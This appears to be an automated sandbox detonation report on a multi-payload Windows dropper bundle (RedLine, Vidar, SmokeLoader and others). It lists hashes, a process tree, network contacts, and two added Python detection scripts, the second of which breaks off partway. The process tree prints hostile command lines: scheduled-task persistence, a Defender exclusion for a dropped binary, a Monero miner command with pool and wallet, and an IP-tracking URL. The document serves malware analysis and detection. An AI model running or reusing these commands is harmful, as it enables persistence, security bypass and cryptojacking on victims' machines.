| SHA512 | c9ece78875e1018d4126e9c563c438da545532cd374dfb422e22e55812fc09626dbd991dfc7bfa94d5d2003239394f7d09bc948a3540fb29e5c9fba3891c95cf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-31 03:59
Reported
2024-01-02 03:57
Platform
win10v2004-20231215-en
Max time kernel
0s
Max time network
106s
Command Line
Signatures
NullMixer
PrivateLoader
RedLine
RedLine payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
RisePro
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
SmokeLoader
Vidar
Vidar Stealer
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe
"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 45523e3cdecd50c9.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cc8d5bf9d8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 52748077bb26.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\0c879100232.exe
0c879100232.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2544 -ip 2544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 556
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704167719 0
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe
"C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe" -a
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe
23cfc2c69e2b5.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cc8d5bf9d8.exe
cc8d5bf9d8.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cfbebc6111c611.exe
cfbebc6111c611.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\52748077bb26.exe
52748077bb26.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\45523e3cdecd50c9.exe
45523e3cdecd50c9.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\f35fb6370e5673.exe
f35fb6370e5673.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\227af833e4e9ad4.exe
227af833e4e9ad4.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\dc8baab07.exe
dc8baab07.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dc8baab07.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 23cfc2c69e2b5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f35fb6370e5673.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 227af833e4e9ad4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 0c879100232.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cfbebc6111c611.exe
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS1807.tmp\Install.cmd" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb469e46f8,0x7ffb469e4708,0x7ffb469e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
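The process listing above contains the four command lines a responder should be able to pick out mechanically: the schtasks persistence into a user-writable path at logon with highest run level, the PowerShell Defender exclusion for the dropped 1cr.exe, the explorer.exe image carrying xmrig-style miner arguments, and the winnetdriv.exe image whose recorded command line names a different binary. The script below is an added example (not part of the sandbox report and not the vendor's detection logic) that runs a small set of such rules over a constructed subset of those (image path, command line) pairs; the rule names, the Finding type and the WOW64 path normalisation are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: (image path, command line) pairs copied from the Processes
# listing above; the very long miner command line is trimmed to its telling flags.
SAMPLE_PROCESSES = [
    (r"C:\Windows\system32\schtasks.exe",
     r"""schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'"""),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"'),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --url=xmr-eu2.nanopool.org:14433 --pass= --cpu-max-threads-hint=30 --tls --cinit-stealth"),
    (r"C:\Windows\winnetdriv.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704167719 0'),
    (r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\Windows\system32\cmd.exe /c 45523e3cdecd50c9.exe"),
]

@dataclass(frozen=True)
class Finding:
    rule: str     # hypothetical rule identifier, chosen for this example
    image: str
    detail: str

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
MINER_FLAGS = ("--algo=", "--url=", "--donate-level=", "--cpu-max-threads-hint=", "--cinit-stealth")
TRACKING_HOSTS = ("iplogger.org", "ipinfo.io")   # hosts the report itself flags as IP lookup / tracking

def _norm(path: str) -> str:
    # WOW64 file-system redirection: a 32-bit process that names System32 is served SysWOW64 on disk
    return re.sub(r"\\syswow64\\", r"\\system32\\", path.lower())

def check_scheduled_task(image: str, cmdline: str) -> Optional[Finding]:
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low:
        return None
    m = re.search(r"/tr\s+'?\"?([^'\"]+)", cmdline, re.IGNORECASE)
    target = m.group(1).strip() if m else ""
    flags = [name for name, hit in (("onlogon", "/sc onlogon" in low),
                                    ("highest", "/rl highest" in low),
                                    ("user-writable-target", bool(USER_WRITABLE.search(target)))) if hit]
    return Finding("persistence.schtasks", image, f"{target} [{', '.join(flags)}]") if flags else None

def check_defender_exclusion(image: str, cmdline: str) -> Optional[Finding]:
    m = re.search(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+\"?([^\"]+)", cmdline, re.IGNORECASE)
    return Finding("defense_evasion.defender_exclusion", image, f"{m.group(1)}={m.group(2).strip()}") if m else None

def check_miner_args(image: str, cmdline: str) -> Optional[Finding]:
    hits = [f for f in MINER_FLAGS if f in cmdline]
    if len(hits) < 2:
        return None
    pool = re.search(r"--url=(\S+)", cmdline)
    return Finding("impact.coinminer_args", image, f"pool={pool.group(1) if pool else '?'} flags={hits}")

def check_image_mismatch(image: str, cmdline: str) -> Optional[Finding]:
    # The first token of the command line should name the image; a different .exe path
    # means the binary was copied/renamed or the process was started on behalf of another file.
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    first = (m.group(1) or m.group(2) or "") if m else ""
    if "\\" in first and first.lower().endswith(".exe") and _norm(first) != _norm(image):
        return Finding("anomaly.image_cmdline_mismatch", image, f"command line names {first}")
    return None

def check_hexnamed_exec(image: str, cmdline: str) -> Optional[Finding]:
    m = re.search(r"/c\s+([0-9a-f]{8,}\.exe)\s*$", cmdline, re.IGNORECASE)
    return Finding("execution.cmd_runs_hexnamed_exe", image, m.group(1)) if m else None

def check_tracking_url(image: str, cmdline: str) -> Optional[Finding]:
    hosts = [h for h in TRACKING_HOSTS if h in cmdline.lower()]
    return Finding("discovery.victim_tracking_url", image, ", ".join(hosts)) if hosts else None

RULES = (check_scheduled_task, check_defender_exclusion, check_miner_args,
         check_image_mismatch, check_hexnamed_exec, check_tracking_url)

def run_rules(processes):
    """Apply every rule to every (image, cmdline) pair; returns the findings in listing order."""
    findings = []
    for image, cmdline in processes:
        for rule in RULES:
            hit = rule(image, cmdline)
            if hit:
                findings.append(hit)
    return findings

if __name__ == "__main__":
    for f in run_rules(SAMPLE_PROCESSES):
        print(f"{f.rule:36} {f.image}\n{'':36} {f.detail}")
```

The image/command-line comparison only fires after folding SysWOW64 onto System32, otherwise every 32-bit cmd.exe and powershell.exe launch in this report would be a false positive; the winnetdriv.exe entry still stands out because its command line names setup.exe in a different directory.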
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | marisana.xyz | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 37.0.8.235:80 | | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 74.114.154.22:443 | lenak513.tumblr.com | tcp |
| US | 8.8.8.8:53 | 22.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.132.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 74.114.154.22:443 | lenak513.tumblr.com | tcp |
| US | 74.114.154.22:443 | lenak513.tumblr.com | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
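Read as raw rows, the Network table mixes reverse-DNS lookups, mDNS, browser noise and the connections that matter, and it repeats the live.goatgame.live endpoint dozens of times. What an analyst wants from it is the distinct set of contacted endpoints with a count, the connections made to a bare IP with no preceding name resolution (37.0.8.235:80, 52.142.223.178:80 and 45.142.213.135:30058 here), anything on a non-standard port, and the domains that were queried but never connected to. The script below is an added example (not part of the report) that parses a constructed subset of the table, tolerating rows where extraction shifted the Domain column, and produces that summary; the browser-noise and hosting-domain lists are assumptions of this example, not verdicts from the report.

```python
from collections import Counter

# Constructed sample: a subset of the Network table above in its raw markdown form,
# including rows where the empty Domain cell was dropped and Proto slid left.
SAMPLE_NETWORK_TABLE = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | marisana.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 37.0.8.235:80 | tcp | |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| LV | 45.142.213.135:30058 | tcp | |
"""

# Assumptions for this example: Edge's own image CDN is treated as browser noise and
# dropped; well-known hosting domains are tagged so the analyst checks the URL, not judged.
BROWSER_NOISE = {"tse1.mm.bing.net"}
LEGIT_HOSTING = {"cdn.discordapp.com", "github.com", "raw.githubusercontent.com", "lenak513.tumblr.com"}
STANDARD_PORTS = {80, 443}
MDNS_GROUP = "224.0.0.251"

def parse_rows(table: str):
    """Turn the markdown rows into dicts, repairing rows whose Domain column is missing."""
    rows = []
    for line in table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        if domain in ("tcp", "udp") and proto == "":
            domain, proto = "", domain          # Proto landed in the Domain cell
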